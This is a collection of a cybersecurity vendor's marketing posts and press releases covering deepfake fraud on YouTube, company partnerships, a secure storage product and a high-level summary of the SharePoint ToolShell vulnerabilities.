As featured in Help Net Security: Cybercriminals have built a business on YouTube’s blind spots

The barrier to entry for deepfake fraud has collapsed. What used to require technical expertise, expensive software, and significant time now takes minutes with free AI models and a laptop.

This is a real and current day threat, one that cybercriminals have turned platforms like YouTube into profitable attack vectors.

In a recent Help Net Security article, our CEO Camellia Chan weighs in on how organisations need to respond to the industrialisation of deepfake scams. The piece examines how YouTube’s 2.53 billion users have become targets for AI-powered fraud that traditional security controls simply were never designed to stop.

YouTube Has Become a Business Opportunity for Cybercriminals

The article highlights several large-scale operations exploiting YouTube’s trust infrastructure:

The “Ghost Network” malware campaign involved over 3,000 videos uploaded to fake or hijacked channels. These videos promised cracked software or game hacks, but instead delivered phishing pages and malware downloads. By the time YouTube’s moderation team flagged them, thousands of users had already been compromised.

Deepfake crypto scams have weaponized the likenesses of public figures like Elon Musk, Donald Trump, and Nvidia CEO Jensen Huang to promote fraudulent investment schemes. In one case, a fake Nvidia GTC livestream featuring a deepfake of Jensen Huang drew approximately 100,000 viewers and ranked above the official stream in search results before being taken down.

Hijacked verified channels are being repurposed at scale. Scammers buy or compromise established YouTube accounts with followers and algorithmic trust, then keep the verification badge while flooding the channel with AI-generated scam content. Users see the blue checkmark and assume legitimacy – exactly what attackers are counting on.

As the article notes, researchers found that scammers are even hijacking legitimate business accounts – like a Norwegian design agency’s Google Ads account – to run sophisticated phishing campaigns that mirror official TradingView branding, complete with verified badges and pixel-perfect layouts.

The Economics of Deepfake Fraud Are Accelerating

The financial impact is staggering. According to Deloitte research cited in the article, GenAI-driven fraud losses in the United States are projected to reach $40 billion by 2027, up from $12.3 billion in 2023. That’s a 225% increase in just four years.

This surge is directly tied to the commoditisation of deepfake technology. What was once the domain of nation-state actors and well-funded criminal organisations is now accessible to anyone with an internet connection. Free tools, open-source models, and “deepfake-as-a-service” platforms have turned synthetic media creation into a scalable, low-cost operation.

The article points out that scammers no longer need Hollywood-level production quality. They just need content that’s convincing enough to fool someone for 30 seconds – the time it takes to click a malicious link, download malware, or authorize a fraudulent transaction.

Traditional Security Controls Aren’t Built for This

Now here is the uncomfortable truth: your firewall doesn’t filter synthetic media. Your email gateway doesn’t scan YouTube videos. Your endpoint protection doesn’t flag a tutorial that looks legitimate but delivers ransomware.

The attack surface has expanded beyond the network perimeter into content platforms, social media, and communication channels that employees use every day. And because these threats don’t rely on traditional malware signatures or network anomalies, they slip past conventional defenses undetected.

As our CEO Camellia Chan told Help Net Security: “Treat deepfakes like any other cyber threat and apply a zero-trust mindset. That means don’t assume anything is real just because it looks or sounds convincing.”

This philosophy is at the core of how X-PHY approaches synthetic media detection. Zero-trust can’t stop at authentication and access control anymore. It has to extend to every piece of content your organization encounters – video, audio, images, and documents.

What 2026 Will Bring (And Why You Need to Prepare Now)

The Help Net Security article projects that scam activity on YouTube will continue to rise in 2026 as AI tools become even more accessible and affordable. Here’s what security leaders should expect:

• Faster, cheaper production means more scams will reach wider audiences before platforms can respond
• Coordinated networks of fake creators will post, comment, and interact with each other to appear authentic and game algorithmic recommendations
• More hijacked channels with established audiences and trust will be weaponized for malware distribution and fraud
• Deepfakes of public figures will drive a new wave of investment scams, disinformation campaigns, and brand impersonation attacks

Reactive content moderation cannot scale to meet this threat. By the time human reviewers flag and remove malicious content, the damage is already done – systems are compromised, money is stolen, and trust is eroded.

The X-PHY Approach to Deepfake Detection

At X-PHY, we have built our deepfake detection solution on a simple premise: if the threat operates at the speed of AI, your defenses need to as well.

X-PHY Deepfake Detector uses multi-modal AI to analyse synthetic media in real time. Enabling:

1. Real-time detection of AI-generated video, audio, and images without relying on cloud connectivity or external APIs
2. On-device processing that works in high-security, air-gapped environments where traditional SaaS solutions can’t operate
3. Zero-trust verification that treats all content as untrusted until proven authentic—no assumptions based on source, verification badges, or visual quality

The Path Forward: From Awareness to Action

The Help Net Security article makes clear that deepfakes aren’t a niche threat or a distant concern anymore. Deepfakes are a present, profitable, and rapidly scaling attack vector that’s already costing organizations billions.

Security awareness training won’t solve this. Telling employees to “be vigilant” or “look for red flags” is insufficient when the fakes are pixel-perfect and contextually flawless. You can’t train humans to outperform AI-generated deception.

Instead, organisations need to:

1. Expand their threat model to include synthetic media as a critical attack vector across email, collaboration tools, social platforms, and public content
2. Implement zero-trust principles for content verification – not just network access and authentication
3. Deploy autonomous detection across the stack that operates at the speed and sophistication of the attacks themselves
4. Build incident response capabilities specifically designed to handle deepfake scenarios, including brand impersonation, executive fraud, and synthetic media manipulation

Want to learn more about how X-PHY Deepfake Detector works? Schedule a demo or technical briefing with our team here.

Singapore, 22 October 2025 – X-PHY Inc, the cybersecurity arm of the Singapore-headquartered Flexxon Group, and leader in hardware-based cybersecurity solutions, and Ensign InfoSecurity, Asia Pacific’s largest pure-play- end-to-end cybersecurity service provider, have entered into a strategic partnership to strengthen cyber resilience across critical sectors. Together, the parties will explore the co-development and commercialisation of joint innovations, that combine their respective areas of expertise to deliver holistic and seamlessly integrated solutions that secure the digital systems of clients around the world.

The agreement was formalised at GovWare 2025, Singapore’s flagship cybersecurity event that brings together leaders from the public and private sectors across Asia. Ms May Chng, Co-Founder and Chief Operating Officer of X-PHY Inc, and Mr Simon Cheong, Senior Vice President and Head of Sales for International Business & Commercial at Ensign InfoSecurity, signed the partnership agreement on behalf of their respective organisations, with Mr Ted Tan, Board Advisor of the Flexxon Group, and Mr Lim Minhan, Executive Vice President and Head of Consulting at Ensign InfoSecurity, in attendance as witnesses.

The partnership combines X-PHY’s patented AI-embedded hardware cybersecurity innovations – including the X-PHY Cybersecure Solid State Drive and Deepfake Detector – with Ensign’s deep capabilities in end-to-end cybersecurity services, creating a powerful synergy that delivers holistic protection across both hardware and software layers.  

This collaboration also opens opportunities for joint innovation to further enhance the combined portfolio of products, solutions and services offered by both organisations, bridging the gap between device-level protection and enterprise-wide defense against deepfakes, enabling organisations to achieve true end-to-end cyber resilience.

May Chng, Co-Founder & Chief Operating Officer, X-PHY Inc, said: “This partnership unites best-in-class innovation and expertise – combining X-PHY’s advanced hardware-embedded technologies with Ensign’s deep capabilities in technology development, integration and managed security. Together, we are raising the bar for proactive, autonomous and holistic security across the digital infrastructures within Singapore and beyond.”

Simon Cheong, Senior Vice President & Head of Sales for International Business & Commercial, Ensign InfoSecurity, said: “Cybersecurity today demands more than point solutions and requires tightly integrated capabilities that secure every layer, from devices to enterprise systems. This partnership brings together X-PHY’s hardware innovation with Ensign’s deep cybersecurity expertise to create a unified defence fabric that is both intelligent and resilient. By combining our strengths, we are not just enhancing protection but also shaping how next-generation cyber defence is built and delivered.”

Leveraging Ensign’s deep capabilities in end-to-end cybersecurity services and its established global network, the partnership will enhance the reach of these innovations beyond Singapore, supporting cybersecurity modernisation efforts across key regions and countries such as Asia-Pacific, Japan, India, and Europe – showcasing Singapore’s strength as a hub for cybersecurity innovation and export.

Advancing Singapore’s and the Region’s Digital Agendas

The collaboration supports Singapore’s strategic direction towards a multi-layered, coordinated cybersecurity approach – one grounded in the principles of defence-in-depth and Zero Trust readiness, as outlined in the country’s Cybersecurity Strategy 2021 and Government Zero Trust Architecture. 

By combining X-PHY’s AI-embedded, hardware-based cybersecurity technologies with Ensign’s end-to-end cybersecurity expertise and integration capabilities, the partnership helps organisations strengthen continuous validation and verification across users, devices, and systems – extending protection to the hardware layer as part of a holistic, multi-layered defense model for critical sectors.

About X-PHY Inc

X-PHY Inc is a pioneering cybersecurity company dedicated to hardware-based cybersecurity solutions that protect data at its core. Built on the principle of Security by Design, X-PHY embeds AI-embedded protection directly at the physical layer to deliver proactive, autonomous, and real-time defense against evolving cyber threats.

Established in 2021, X-PHY has developed a growing portfolio of over 50 global patents, reinforcing its commitment to advancing zero-trust resilience through hardware-anchored security. Its patented technologies safeguard endpoints, servers, and data centers, providing a holistic foundation for secure digital infrastructure across industries.

For more information, please visit: 

X-PHY: x-phy.com

About Ensign InfoSecurity 

Ensign InfoSecurity is Asia Pacific’s largest pure-play, end-to-end cybersecurity service provider. Headquartered in Singapore, Ensign offers bespoke solutions and services to address their clients’ cybersecurity needs. Their core competencies are in the provision of cybersecurity advisory and assurance services, architecture design and systems integration services, and managed security services for advanced threat detection, threat hunting, and incident response. Underpinning these competencies is in-house research and development in cybersecurity. Ensign has two decades of proven track record as a trusted and relevant service provider, serving clients from the public and private sectors in the Asia Pacific region.

For more information, please visit www.ensigninfosecurity.com

For media queries, please contact:

For X-PHY Inc

Samantha Wong

Director, Communications & Media

1. samantha@flexxon.com
2. (65) 9115 6968

Singapore, 7 October 2025 – X-PHY Inc., a pioneer in hardware-based cybersecurity solutions, today announced the appointment of Acton Technology Pte Ltd as its full-service strategic partner in Southeast Asia. The partnership will deliver next-generation AI-embedded security solutions across the region, helping enterprises build a holistic cybersecurity stack with proactive and intelligent hardware security at its foundation.

Through the partnership, Acton will provide a unified support structure that ensures customers in select regions can lean on a single trusted partner for deployment, integration, managed services, and first-line technical support.

The collaboration leverages Acton’s regional presence, covering Singapore, Malaysia, the Philippines, Thailand, and Vietnam, with a strong focus on industries where cyber resilience is critical – including finance, government, healthcare, enterprises, and critical infrastructure.

“Southeast Asia is a region experiencing rapid digital growth, and with it, a corresponding escalation of cybercrime. As cybercriminals grow in speed, sophistication and opportunity, organisations need security that is proactive, autonomous, and built directly into their systems,” said Camellia Chan, Co-Founder and CEO of X-PHY Inc. “I am glad to welcome Acton to our stable of partners, bringing together X-PHY’s patented hardware-based cybersecurity solutions and Acton’s regional expertise to deliver trusted, localized sales and support that empowers enterprises to defend against today’s most advanced attacks.”

A spokesperson from Acton said, “By partnering with X-PHY, we are expanding access to world-leading, AI-embedded cybersecurity solutions while ensuring organisations across Southeast Asia benefit from faster deployment, localized support, and tailored solutions. Our shared vision is to give enterprises peace of mind with proactive security that adapts to their evolving needs.”

Through this partnership, Acton will build on its growing portfolio of hardware-based security solutions and deliver X-PHY’s suite of solutions to its network of customers in the region. These include:

1. X-PHY Cyber Secure SSDs and Laptops, the brand’s multi-patented and multi-awarded solution that embeds intelligent security at the memory layer for protection at the endpoint – even against zero day threats.
2. X-PHY Deepfake Detector, an on-device deepfake detection solution to combat digital content manipulation.

The partnership reflects X-PHY’s global expansion strategy, combining technological innovation with strong regional partnerships to set new standards for zero-trust, hardware-based protection.

Acton will be showcasing X-PHY’s suite of solutions at Tech Week Singapore from 8 to 9 October, at the Marina Bay Sands Expo and Convention Centre. Visit them at N45.

About X-PHY Inc

X-PHY Inc is a pioneering cybersecurity company dedicated to hardware-based cybersecurity solutions that protect data at its core. Built on the principle of Security by Design, X-PHY embeds protection directly at the physical layer for proactive, autonomous, and real-time defense against evolving cyber threats. Headquartered in California, USA, X-PHY Inc was established in 2021 and has since developed a growing portfolio of 53 patents, reinforcing its commitment to innovative AI-embedded security at the hardware level. The company’s patented solutions safeguard endpoints, servers, and data centers, ensuring zero-trust resilience across industries.

X-PHY Inc is part of the Flexxon Group, a leader in hardware engineering and memory solutions, leveraging its legacy of innovation and expertise in secure storage to build cutting-edge cybersecurity technologies for the digital world.

For more information, please visit: 

X-PHY: x-phy.com

Flexxon: flexxon.com 

About Acton Technology Pte Ltd 

Acton is a leading authorized semiconductor and electronic component distributor with regional coverage in Asia Pacific. Established in 2008, with its headquarters in Singapore, Acton’s distribution network spans across Malaysia, the Philippines, Thailand, Vietnam and China. We provide a wide range of semiconductors, along with active, passive, electromechanical, and mechanical products from leading international manufacturers.

As a fast-growing distributor in the region, Acton Technology is committed in providing quality electronic components, value-added products, and services to its customers. 

For more information, please visit: www.newgenprotect.com

For media queries, please contact:

For X-PHY Inc

Samantha Wong

Director, Communications & Media

1. samantha@flexxon.com
2. (65) 9115 6968

For Acton Tech

protect@acton-tech.com

Singapore, 30 September 2025 – Flexxon, a global leader in industrial NAND flash storage, today announced the launch of X-Mask² Pro – the next evolution of the company’s best-selling X-Mask. Designed to secure and conceal sensitive data in mission-critical operations, X-Mask Pro delivers plug-and-play functionality, paired with unmatched durability, built-in encryption, and regulator-ready compliance, ensuring that vital information remains secure, intact, and invisible to unauthorised individuals.

As industries worldwide generate growing volumes of sensitive operational data – from aerospace and defense to infrastructure monitoring and autonomous systems – protecting this data at the source has become a pressing priority. With X-Mask Pro, Flexxon provides enterprises with a rugged, secure, and regulator-compliant solution that conceals confidential and vital data in field operations.

Camellia Chan, CEO and Co-founder of Flexxon said: “Data is the most valuable asset in today’s digital economy, and it must be protected at the source. Especially in industrial applications, data captured must remain secure and inaccessible to unauthorised individuals at all times. With X-Mask Pro, we are strengthening our leadership in secure storage to deliver a solution that is not only physically resilient but also digitally impenetrable – all while prioritising usability with plug-and-play functionality. Our goal is to make it easy to use for authorised parties, and impossible for prying eyes to reach their target.” 

Industrial-Grade Security and Reliability

Building on Flexxon’s long-standing prowess in developing secure industrial memory solutions, X-Mask Pro delivers a powerful combination of durability, encryption, and endurance. Rigorously tested to withstand extreme temperatures from -40°C to 85°C, high humidity, shock forces up to 1500G, vibrations, and drops from 1.5 meters, X-Mask Pro delivers consistent performance under the most demanding conditions. It is also tested against bending stress, torque, and electrostatic discharge (ESD) up to ±8kV, ensuring resilience during real-world deployment.

At the same time, X-Mask Pro’s hardware-based encryption and data concealment capabilities ensure that sensitive data remains invisible and unreadable to unauthorized users. Together with these functions, proprietary software authentication controls through the X-Mask Pro Tool, allow for seamless setup and configuration by users to conceal or unlock the data stored. 

Beyond resilience and security, X-Mask Pro is fully regulator-ready, meeting the strictest global compliance requirements – from General Data Protection Regulation (GDPR) to national security and legal standards – and is built to support nonstop, high-volume recording across advanced applications such as HD video, LiDAR, and multispectral sensors.

How X-Mask Pro Works

At its core, X-Mask Pro integrates hardware-based encryption with proprietary authentication controls to safeguard sensitive data from interception or tampering. Unlike standard memory cards that can be easily removed, stolen, and read, X-Mask Pro ensures that all stored information remains concealed and encrypted without authorized access. 

Combined with Flexxon’s industrial-grade engineering, X-Mask Pro is resistant to extreme environmental stress, ensuring that data not only remains secure but also intact. This makes X-Mask Pro uniquely capable of addressing both security threats and environmental risks, offering end-to-end assurance for industries and professionals who require uncompromised data integrity.

Prioritising Ease of Use

X-Mask Pro is designed to make security seamless. Users first activate card security on their PC, creating a protected environment for all future use. Once activated, the card can be inserted into any device with a microSD slot, and used normally, with contents remaining fully readable during operation.

The difference comes when the card is removed or the device is powered off. At this point, all data is automatically encrypted and hidden, making it unreadable to anyone without authorization. To access the content again, users simply authenticate and unlock the card on a PC using a secure PIN.

This process ensures that data is always available to authorized users, while remaining completely inaccessible to anyone without proper access or authorization. From professional photographers managing high-value shoots to surveillance operators safeguarding sensitive footage, X-Mask Pro delivers peace of mind through end-to-end, automated protection.

Available now in capacities from 64GB to 128GB, X-Mask Pro can be purchased online through Flexxon’s eStore or any of our global authorised retailers. The full list of partners can be found here.

Footnotes:

^[1] Product image is for illustration purposes only. Actual product design may vary.

^[2] X-Mask is a registered trademark of Flexxon Pte Ltd.

For media queries, please contact:

Samantha Wong

Director, Communications & Media

1. samantha@flexxon.com
2. (65) 9115 6968

This definition of a deepfake has now worked its way into the Oxford English Dictionary, reflecting how mainstream and pervasive deepfakes have become. If anything, it demonstrates that the threat is here to stay. 

In the deepfake conversation, it’s important to distinguish that not all AI-generated content is created equal. Some uses are creative and helpful, while others are deceptive and harmful. The distinction lies in intent.

To understand the difference, let’s step into a carnival.

AI-Generated Content – The Magician

On one side of the carnival tent, a magician conjures a dazzling, original painting out of thin air. It’s trickery, but you’re in on the fun. The magician winks, and you cheer -entertained, inspired, maybe even amazed.

That magician represents AI-generated content.

AI models like ChatGPT, DALL·E, DeepSeek, Grok and a whole host of other AI tools enable the creation of content, whether that’s a surreal illustration or a cool video clip of Godzilla working in your office. Their purpose? Creativity, productivity, empowerment, and fun.

This is where the category of harmless deepfakes fit in. TikTok face-swap filters, parody videos where celebrities “sing” unexpected songs, or playful experiments like the Tom Cruise parody are entertaining precisely because the audience understands they’re not real. They belong in the magician’s act — fun illusions made to amuse, not to deceive.

The intent here is clear: whether it’s generative AI or parody-style deepfakes, the purpose is creativity, inspiration, or laughter — not harm.

Malicious Deepfakes – The Con Artist

On the other side of the carnival, a con artist steps on stage with a painting for auction — but it’s a forgery. They pass it off as priceless, tricking the crowd into believing it’s real — for his own profit.

That’s the world of malicious deepfakes.

They rely on the very same AI tools and technologies that power fun, creative, and educational applications. The difference lies in intent. Where AI-generated content aims to entertain or inspire, malicious deepfakes are engineered to deceive.

Whether it’s impersonating a CEO to authorize fraudulent wire transfers, fabricating political speeches to sway public opinion, or creating non-consensual content to damage reputations, the con artist’s goal is always the same: profit, manipulation, or harm.

Here, the intent isn’t to entertain — it’s to deceive. And that’s what makes malicious deepfakes so dangerous: they erode trust at its core.

Case Study: The Tom Cruise Deepfake

In 2021, TikTok exploded with videos of “Tom Cruise” — playing golf, telling stories, even doing magic tricks. Millions of people were captivated.

But here’s the twist: it wasn’t Tom Cruise.

The creator, known as @deeptomcruise on TikTok, is a skilled impersonator who studied Tom’s voice, gestures, and mannerisms. Combined with faceswap AI and post-production editing, the result was a deepfake so convincing that even seasoned viewers did a double take.

This was a magician’s trick — a parody, not a scam. But it highlighted how thin the line can be. The very same techniques that made millions laugh could just as easily be misused to mislead millions more.

X-PHY Deepfake Detector: Seeing What Humans Can’t

That’s where the X-PHY Deepfake Detector comes in. A tool that spots and surfaces manipulated content that is invisible to the human eye. It detects subtle signs of manipulation, such as unnatural micro-expressions, lip-sync mismatches, and synthetic audio fingerprints.

All of this happens in real time, on-device, with evidence logging built in. No cloud uploads. No privacy trade-offs. Just secure, trustworthy detection when and where it matters most.

Making digital trust a possibility

From carnival tricks to viral parodies, AI-generated content and deepfakes are reshaping the way we experience digital media. AI-supported creativity can inspire us, but malicious deepfakes threaten to erode trust at its core.

There is no denying that deepfakes have gone mainstream. The Tom Cruise case, amongst many others, show us how convincing they can be. And X-PHY Deepfake Detector shows us that spotting them isn’t Mission Impossible.

Sign up for a 7-Day free trial or drop us a message to learn more about enterprise pricing.

But with convenience comes hidden risks. Employees may unknowingly expose sensitive corporate data when using GenAI tools, creating new avenues for insider threats.

In a recent Forbes Technology Council article, our CEO & Co-founder Camellia Chan explains why the solution is not to ban GenAI in the workplace. Instead, organisations need to fix the risks, not the tool.

Key Highlights from the Article

1. Shadow AI creates insider threats: Well-intentioned employees often use GenAI on personal accounts, but this “shadow AI” usage can leak sensitive data outside IT’s visibility.
2. Traditional defenses fall short: Software-based tools like DLP and behavioral analytics are essential, but they can miss risks – especially when compromised credentials make malicious activity look legitimate.
3. Hardware-level zero trust is the missing piece: Embedding security directly at the physical layer, within the memory storage, enables autonomous, real-time defense. By detecting unusual activity such as mass data transfers – even after a breach – hardware-level security stops threats before data escapes. 
4. A holistic strategy is needed: The path forward is not banning GenAI but creating a GenAI-aware security strategy that blends governance, employee education, monitoring, and hardware-based protection.

Explore how X-PHY brings this vision to life with our patented AI-embedded hardware security solutions, available now on our X-PHY eStore.

Read the Full Article: Fix the Risk, Don’t Ban the Tool: How To Secure GenAI At Work on Forbes.

1. A breach has already happened
2. Many more are still vulnerable

That’s exactly what happened on July 19, when Microsoft issued an urgent alert about two zero-day vulnerabilities.

At the time of writing:

On July 19 2025, Microsoft issued an urgent alert for two zero-day vulnerabilities affecting on-premises SharePoint servers, now tracked as CVE-2025-53770 and CVE-2025-53771, and collectively dubbed ToolShell. These vulnerabilities do not impact SharePoint Online but pose a severe risk to organizations running on-prem SharePoint instances.

1. CVE-2025-53770 enables unauthenticated remote code execution (RCE) by exploiting unsafe deserialization, allowing attackers to gain complete control of compromised servers. It carries a critical CVSS score of 9.8/10 and is already being actively exploited in global campaigns targeting government, telecom, and software sectors.
2. CVE-2025-53771 is a spoofing/path traversal vulnerability allowing attackers to bypass authentication via improper header validation. When chained with the first vulnerability, it enables the full ToolShell exploit chain.

The ToolShell attack chain has been used to:

1. Gain access, steal credentials, and in some cases, deploy ransomware
2. Extract sensitive cryptographic keys
3. Use in-memory payloads that evade traditional defenses by avoiding file-based artifacts

Researchers and Microsoft have identified three active attack clusters using evolving tactics and payloads to avoid detection. Microsoft has released emergency out-of-band patches for SharePoint Subscription Edition and 2019 (with 2016 patches pending). 

Security agencies urged immediate patching, key rotation, and enhanced endpoint monitoring.

In short, ToolShell is an evolving, active, and critical threat to on-prem SharePoint deployments.

By the time Microsoft’s alert went out, the first wave of breaches had already begun on July 18, with hackers planting shells that leaked sensitive key material. Even after patching, stolen keys could allow attackers to impersonate legitimate users, making this far more dangerous than a typical “update and you’re safe” incident.

In a comment to Security Boulevard, our CEO, Camellia Chan, shared, “No amount of patching or perimeter defense can guarantee safety when trust assumptions are baked into software architecture. Organizations need to embed protection directly in hardware to close the gap software alone can’t.”

Cybersecurity agencies in the U.S., Canada, and Australia warned that this is not a “patch-and-forget” problem. 

Experts recommend:

1. Patch immediately, but never assume you’re safe
2. Investigate for compromise both before and after updates
3. Harden defenses with zero-trust, hardware-level protections that detect and block threats in real time

The ToolShell campaign is a wake-up call for anyone running exposed on-premises systems. 

Read the full article on Security Boulevard here: https://securityboulevard.com/2025/07/hackers-exploiting-microsoft-flaw-to-attack-governments-businesses/

To learn more about how our solutions can support your cybersecurity strategy, drop us a message at info@x-phy.com, and let’s get started!